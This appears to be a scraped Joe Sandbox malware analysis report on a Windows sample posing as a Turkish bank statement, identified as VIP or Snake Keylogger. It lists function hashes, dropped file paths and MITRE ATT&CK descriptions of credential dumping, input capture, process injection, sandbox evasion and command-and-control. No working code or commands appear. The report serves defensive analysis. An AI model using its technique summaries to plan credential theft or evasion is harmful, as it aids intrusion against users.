Opcode Fuzzy Hash: 618c1ad24ff4c71605355fb32fb02c3df3270319108140da4b928eca62cd0a65
Instruction Fuzzy Hash: 32015378D0028A9FDB01DFA4E884AAEBBB1FB88300F404169E810F3354EB345A59CF90

Function 02A428A3 Relevance: .0, Instructions: 22COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 18e265577ebf177785f8870e077603c1036cfee3c30db84cff82666a0b88fdf2
Instruction ID: af8cdb6edd9604660e1c6dcc870dc8439a61744a42f5094a528113de2f9828b3
Opcode Fuzzy Hash: 18e265577ebf177785f8870e077603c1036cfee3c30db84cff82666a0b88fdf2
Instruction Fuzzy Hash: 83E08632D2026A56CB01E7A5EC416DEFB39EF85214F984565E91032540EB302568C6A0

Function 02A428B0 Relevance: .0, Instructions: 19COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 3547cdffe1a8ffd36091d2af978552210f1a99d7d9940b86dd4667f906886746
Instruction ID: 73aaf64c7bb5018b7e65ebf16bc7ffe48f22b4e9635f271f6c0d446ca8962ddd
Opcode Fuzzy Hash: 3547cdffe1a8ffd36091d2af978552210f1a99d7d9940b86dd4667f906886746
Instruction Fuzzy Hash: 57D02B31D2022B53CB00E7A1FC004DFF738EEC1220B404222E91033000FB302658C6F0

Function 02A46739 Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5f4e4e58dceafc91a2753a6edc8f470601baae2b65f105bf279028ab3bcc082b
Instruction ID: 2a74d232d0b0206495f542138fc71c3c46f80a743f47bd07121383293033a4cb
Opcode Fuzzy Hash: 5f4e4e58dceafc91a2753a6edc8f470601baae2b65f105bf279028ab3bcc082b
Instruction Fuzzy Hash: A8D02E300043874ACB06F770FC063183F7BA7C0200F88A228F0042A90BEFAC0A5A8B90

Function 02A4AFAD Relevance: .0, Instructions: 16COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5156480dee5ada6306f31c65c2f5da9cf3082e532e17a9cb1a4f2e280310bb5
Instruction ID: 52365e664f18ff8d61aaca019153fbf28738dbe55212663b870e1ef9eecb93d9
Opcode Fuzzy Hash: c5156480dee5ada6306f31c65c2f5da9cf3082e532e17a9cb1a4f2e280310bb5
Instruction Fuzzy Hash: 5CD0673AB10108DFCB149F98E8409DDF7B6FB98621B148126F915A7260C6319925DB50

Function 02A46748 Relevance: .0, Instructions: 12COMMON

Download Yara Rule

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 71207a5bc8e13b1bc71324946279efcf462e6ead1fbd81cae3ecc0a5bfa2eb0a
Instruction ID: ef4b3ef8f36a6b4395d6332fbfb7da84d7c6cf206533f216b7f05e9e194ae90b
Opcode Fuzzy Hash: 71207a5bc8e13b1bc71324946279efcf462e6ead1fbd81cae3ecc0a5bfa2eb0a
Instruction Fuzzy Hash: 72C0123004030A8AD549FB75EC466193BAAE6C0300BC0B628E1056A64DDFF81E964690

Non-executed Functions

Function 02A423DB Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 02A4247F
F, xrefs: 02A42462
[Op^, xrefs: 02A4241D, 02A42422
F, xrefs: 02A42438

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID: F$F$F$[Op^
API String ID: 0-907205980
Opcode ID: 3550d890bf9bbb48813eccc09a0f220d5f785fdc867805ca49751b4285fb9131
Instruction ID: 94e63e18379334a47584719c9a0c14346b07cf880011ad0c6835be112592a467
Opcode Fuzzy Hash: 3550d890bf9bbb48813eccc09a0f220d5f785fdc867805ca49751b4285fb9131
Instruction Fuzzy Hash: DA215C74E00209DBDB08EFBAD4417AEBBB2EFC5704F10946A9415AB385DF749A46CF41

Function 02A426AB Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

+Op^, xrefs: 02A426ED, 02A426F2
F, xrefs: 02A42708
F, xrefs: 02A42732
F, xrefs: 02A4274F

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID: +Op^$F$F$F
API String ID: 0-1706418786
Opcode ID: acac2521bf2a376195e0c60c20b6a0b6b55ebcd4c40d6a17651322fab4aaaa33
Instruction ID: 00ae1b5de6d7bd20455f2951a49633fede9db359d4b3debabcb674b4bda55313
Opcode Fuzzy Hash: acac2521bf2a376195e0c60c20b6a0b6b55ebcd4c40d6a17651322fab4aaaa33
Instruction Fuzzy Hash: 94214A74E00249DBDB08EFBAD4417AEBBB2EBC5304F10946A9415AB394DF749A42CF41

Function 02A424CB Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 02A42528
F, xrefs: 02A4256F
F, xrefs: 02A42552
KOp^, xrefs: 02A4250D, 02A42512

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID: F$F$F$KOp^
API String ID: 0-1372340626
Opcode ID: cfad7e5178f80d0d01e06e387ccb46b00a162a5151618674e355f013ab64792f
Instruction ID: 29e4c73126f8b8e3f88d839119b5ed52fcb8986c2dfe45b1350d7d3a2ff5661a
Opcode Fuzzy Hash: cfad7e5178f80d0d01e06e387ccb46b00a162a5151618674e355f013ab64792f
Instruction Fuzzy Hash: 79214DB4E00209DFDB09EFB9D4517AEB7B2EBC5304F1094AA9415AB384DF749A42CF42

Function 02A425BB Relevance: 5.1, Strings: 4, Instructions: 62COMMON

Download Yara Rule

Strings

F, xrefs: 02A4265F
F, xrefs: 02A42618
;Op^, xrefs: 02A425FD, 02A42602
F, xrefs: 02A42642

Memory Dump Source

Source File: 0000000E.00000002.4793593922.0000000002A40000.00000040.00000800.00020000.00000000.sdmp, Offset: 02A40000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_2a40000_EfgRyiVrT.jbxd

Similarity

API ID:
String ID: ;Op^$F$F$F
API String ID: 0-2345365362
Opcode ID: 3dc3bddc256b7597f15ef1b0cc18edef86ff10eeb2506c1c0fd0fbf1182785ab
Instruction ID: b3699e92fe0dab9fdce47ef825a938d5c0f0bdfbb0a8631aaaf1b18517e1269a
Opcode Fuzzy Hash: 3dc3bddc256b7597f15ef1b0cc18edef86ff10eeb2506c1c0fd0fbf1182785ab
Instruction Fuzzy Hash: B2214D74E00209DBDB09EFB9C4417AEBBB2EBC5304F10946A9515AB384DF749A42CF81

Description:	Adversaries may interact with the native OS application programming interface (API) to execute behaviors. Native APIs provide a controlled means of calling low-level OS services within the kernel, such as those involving hardware/devices, memory, and processes.These native APIs are leveraged by the OS during system boot (when other system components are not yet initialized) as well as carrying out tasks and requests during routine operations.
Tactics:	Execution
Data Sources:	Module: Module Load, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.
Tactics:	Execution, Persistence, Privilege Escalation
Data Sources:	Command: Command Execution, Container: Container Creation, File: File Creation, File: File Modification, Process: Process Creation, Scheduled Job: Scheduled Job Creation
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may execute their own malicious payloads by side-loading DLLs. Similar to DLL Search Order Hijacking , side-loading involves hijacking which DLL a program loads. But rather than just planting the DLL within the search order of a program then waiting for the victim application to be invoked, adversaries may directly side-load their payloads by planting then invoking a legitimate application that executes their payload(s).
Tactics:	Defense Evasion, Persistence, Privilege Escalation
Data Sources:	File: File Creation, File: File Modification, Module: Module Load, Process: Process Creation
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may inject code into processes in order to evade process-based defenses as well as possibly elevate privileges. Process injection is a method of executing arbitrary code in the address space of a separate live process. Running code in the context of another process may allow access to the process's memory, system/network resources, and possibly elevated privileges. Execution via process injection may also evade detection from security products since the execution is masked under a legitimate process.
Tactics:	Defense Evasion, Privilege Escalation
Data Sources:	File: File Metadata, File: File Modification, Module: Module Load, Process: OS API Execution, Process: Process Access, Process: Process Metadata, Process: Process Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify and/or disable security tools to avoid possible detection of their malware/tools and activities. This may take many forms, such as killing security software processes or services, modifying / deleting Registry keys or configuration files so that tools do not operate properly, or other methods to interfere with security tools scanning or reporting information. Adversaries may also disable updates to prevent the latest security patches from reaching tools on victim systems.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, Driver: Driver Load, Process: Process Creation, Process: Process Termination, Sensor Health: Host Status, Service: Service Metadata, Windows Registry: Windows Registry Key Deletion, Windows Registry: Windows Registry Key Modification
Platforms:	Containers, IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use Obfuscated Files or Information to hide artifacts of an intrusion from analysis. They may require separate mechanisms to decode or deobfuscate that information depending on how they intend to use it. Methods for doing that include built-in functionality of malware or by using utilities present on the system.
Tactics:	Defense Evasion
Data Sources:	File: File Modification, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to make an executable or file difficult to discover or analyze by encrypting, encoding, or otherwise obfuscating its contents on the system or in transit. This is common behavior that can be used across different platforms and the network to evade defenses.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Creation, File: File Metadata, Module: Module Load, Process: OS API Execution, Process: Process Creation, Script: Script Execution, WMI: WMI Creation, Windows Registry: Windows Registry Key Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may perform software packing or virtual machine software protection to conceal their code. Software packing is a method of compressing or encrypting an executable. Packing an executable changes the file signature in an attempt to avoid signature-based detection. Most decompression techniques decompress the executable code in memory. Virtual machine software protection translates an executable's original code into a special format that only a special virtual machine can run. A virtual machine is then called to run this code.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may modify file time attributes to hide new or changes to existing files. Timestomping is a technique that modifies the timestamps of a file (the modify, access, create, and change times), often to mimic files that are in the same folder. This is done, for example, on files that have been modified or created by the adversary so that they do not appear conspicuous to forensic investigators or file analysis tools.
Tactics:	Defense Evasion
Data Sources:	File: File Metadata, File: File Modification
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to manipulate features of their artifacts to make them appear legitimate or benign to users and/or security tools. Masquerading occurs when the name or location of an object, legitimate or malicious, is manipulated or abused for the sake of evading defenses and observation. This may include manipulating file metadata, tricking users into misidentifying the file type, and giving legitimate task or service names.
Tactics:	Defense Evasion
Data Sources:	Command: Command Execution, File: File Metadata, File: File Modification, Image: Image Metadata, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Scheduled Job: Scheduled Job Metadata, Scheduled Job: Scheduled Job Modification, Service: Service Creation, Service: Service Metadata
Platforms:	Containers, Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ various means to detect and avoid virtualization and analysis environments. This may include changing behaviors based on the results of checks for the presence of artifacts indicative of a virtual machine environment (VME) or sandbox. If the adversary detects a VME, they may alter their malware to disengage from the victim or conceal the core functions of the implant. They may also search for VME artifacts before dropping secondary or additional payloads. Adversaries may use the information learned from [Virtualization/Sandbox Evasion](https://attack.mitre.org/techniques/T1497) during automated discovery to shape follow-on behaviors.
Tactics:	Defense Evasion, Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to dump credentials to obtain account login and credential material, normally in the form of a hash or a clear text password, from the operating system and software. Credentials can then be used to perform Lateral Movement and access restricted information.
Tactics:	Credential Access
Data Sources:	Active Directory: Active Directory Object Access, Command: Command Execution, File: File Access, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow, Process: OS API Execution, Process: Process Access, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use methods of capturing user input to obtain credentials or collect information. During normal system usage, users often provide credentials to various different locations, such as login pages/portals or system dialog boxes. Input capture mechanisms may be transparent to the user (e.g. Credential API Hooking ) or rely on deceiving the user into providing input into what they believe to be a genuine service (e.g. Web Portal Capture ).
Tactics:	Collection, Credential Access
Data Sources:	Driver: Driver Load, File: File Modification, Process: OS API Execution, Process: Process Creation, Process: Process Metadata, Windows Registry: Windows Registry Key Modification
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may enumerate files and directories or may search in specific locations of a host or network share for certain information within a file system. Adversaries may use the information from File and Directory Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may attempt to get detailed information about the operating system and hardware, including version, patches, hotfixes, service packs, and architecture. Adversaries may use the information from System Information Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	IaaS, Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may interact with the Windows Registry to gather information about the system, configuration, and installed software.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Windows Registry: Windows Registry Key Access
Platforms:	Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get a listing of security software, configurations, defensive tools, and sensors that are installed on a system or in a cloud environment. This may include things such as firewall rules and anti-virus. Adversaries may use the information from Security Software Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Firewall: Firewall Enumeration, Firewall: Firewall Metadata, Process: OS API Execution, Process: Process Creation
Platforms:	Azure AD, Google Workspace, IaaS, Linux, macOS, Office 365, SaaS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to get information about running processes on a system. Information obtained could be used to gain an understanding of common software/applications running on systems within the network. Adversaries may use the information from Process Discovery during automated discovery to shape follow-on behaviors, including whether or not the adversary fully infects the target and/or attempts specific actions.
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may look for details about the network configuration and settings, such as IP and/or MAC addresses, of systems they access or through information discovery of remote systems. Several operating system administration utilities exist that can be used to gather this information. Examples include Arp , ipconfig / ifconfig , nbtstat , and route .
Tactics:	Discovery
Data Sources:	Command: Command Execution, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	An adversary may compress and/or encrypt data that is collected prior to exfiltration. Compressing the data can help to obfuscate the collected data and minimize the amount of data sent over the network. Encryption can be used to hide information that is being exfiltrated from detection or make exfiltration less conspicuous upon inspection by a defender.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Creation, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Behavior Section

Behavior Chronological

Disassembly

Uncategorized

Graph

Loading Joe Sandbox Report ...

Warning!

Windows Analysis Report Hesap_Hareketleri_09122024_html.exe

Overview

General Information

Detection

Signatures

Classification

Process Tree

Malware Threat Intel

Malware Configuration

Threatname: VIP Keylogger

Threatname: Snake Keylogger

Yara Signatures

Memory Dumps

Unpacked PEs

Sigma Signatures

System Summary

Persistence and Installation Behavior

Suricata Signatures

Joe Sandbox Signatures

AV Detection

Location Tracking

Compliance

Software Vulnerabilities

Networking

Key, Mouse, Clipboard, Microphone and Screen Capturing

System Summary

Data Obfuscation

Persistence and Installation Behavior

Boot Survival

Hooking and other Techniques for Hiding and Protection

Malware Analysis System Evasion

Anti Debugging

HIPS / PFW / Operating System Protection Evasion

Language, Device and Operating System Detection

Stealing of Sensitive Information

Remote Access Functionality

Mitre Att&ck Matrix

Behavior Graph

Screenshots

Thumbnails

Antivirus, Machine Learning and Genetic Malware Detection

Initial Sample

Dropped Files

Unpacked PE Files

Domains

URLs

Domains and IPs

Contacted Domains

Contacted URLs

URLs from Memory and Binaries

World Map of Contacted IPs

Public IPs

General Information

Warnings

Simulations

Behavior and APIs

Joe Sandbox View / Context

IPs

Domains

ASNs

JA3 Fingerprints

Dropped Files

Created / dropped Files

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\EfgRyiVrT.exe.log

C:\Users\user\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\Hesap_Hareketleri_09122024_html.exe.log

C:\Users\user\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_0uua0xcn.jux.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_3my3vveq.2o2.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_cnjwq4ds.jns.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fpnapqxd.ako.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_fzan32oo.ktk.psm1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_ignyguij.zcz.ps1

C:\Users\user\AppData\Local\Temp\__PSScriptPolicyTest_qavs3yt0.jw2.psm1

Windows Analysis Report
Hesap_Hareketleri_09122024_html.exe

Description:	Adversaries may search local system sources, such as file systems and configuration files or local databases, to find files of interest and sensitive data prior to Exfiltration.
Tactics:	Collection
Data Sources:	Command: Command Execution, File: File Access, Process: OS API Execution, Process: Process Creation, Script: Script Execution
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may attempt to take screen captures of the desktop to gather information over the course of an operation. Screen capturing functionality may be included as a feature of a remote access tool used in post-compromise operations. Taking a screenshot is also typically possible through native utilities or API calls, such as `CopyFromScreen` , `xwd` , or `screencapture` .
Tactics:	Collection
Data Sources:	Command: Command Execution, Process: OS API Execution
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may target user email to collect sensitive information. Emails may contain sensitive data, including trade secrets or personal information, that can prove valuable to adversaries. Adversaries can collect or forward email from mail servers or clients.
Tactics:	Collection
Data Sources:	Application Log: Application Log Content, Command: Command Execution, File: File Access, Logon Session: Logon Session Creation, Network Traffic: Network Connection Creation
Platforms:	Google Workspace, Linux, macOS, Office 365, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an existing, legitimate external Web service as a means for relaying data to/from a compromised system. Popular websites and social media acting as a mechanism for C2 may give a significant amount of cover due to the likelihood that hosts within a network are already communicating with them prior to a compromise. Using common services, such as those offered by Google or Twitter, makes it easier for adversaries to hide in expected noise. Web service providers commonly use SSL/TLS encryption, giving adversaries an added level of protection.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may transfer tools or other files from an external system into a compromised environment. Tools or files may be copied from an external adversary-controlled system to the victim network through the command and control channel or through alternate protocols such as ftp . Once present, adversaries may also transfer/spread tools between victim devices within a compromised environment (i.e. Lateral Tool Transfer ).
Tactics:	Command and Control
Data Sources:	Command: Command Execution, File: File Creation, Network Traffic: Network Connection Creation, Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may employ a known encryption algorithm to conceal command and control traffic rather than relying on any inherent protections provided by a communication protocol. Despite the use of a secure algorithm, these implementations may be vulnerable to reverse engineering if secret keys are encoded and/or generated within malware samples/configuration files.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may use an OSI non-application layer protocol for communication between host and C2 server or among infected hosts within a network. The list of possible protocols is extensive.Specific examples include use of network layer protocols, such as the Internet Control Message Protocol (ICMP), transport layer protocols, such as the User Datagram Protocol (UDP), session layer protocols, such as Socket Secure (SOCKS), as well as redirected/tunneled protocols, such as Serial over LAN (SOL).
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Network, Windows
Url:	Open detailed description by Mitre

Description:	Adversaries may communicate using OSI application layer protocols to avoid detection/network filtering by blending in with existing traffic. Commands to the remote system, and often the results of those commands, will be embedded within the protocol traffic between the client and server.
Tactics:	Command and Control
Data Sources:	Network Traffic: Network Traffic Content, Network Traffic: Network Traffic Flow
Platforms:	Linux, macOS, Windows
Url:	Open detailed description by Mitre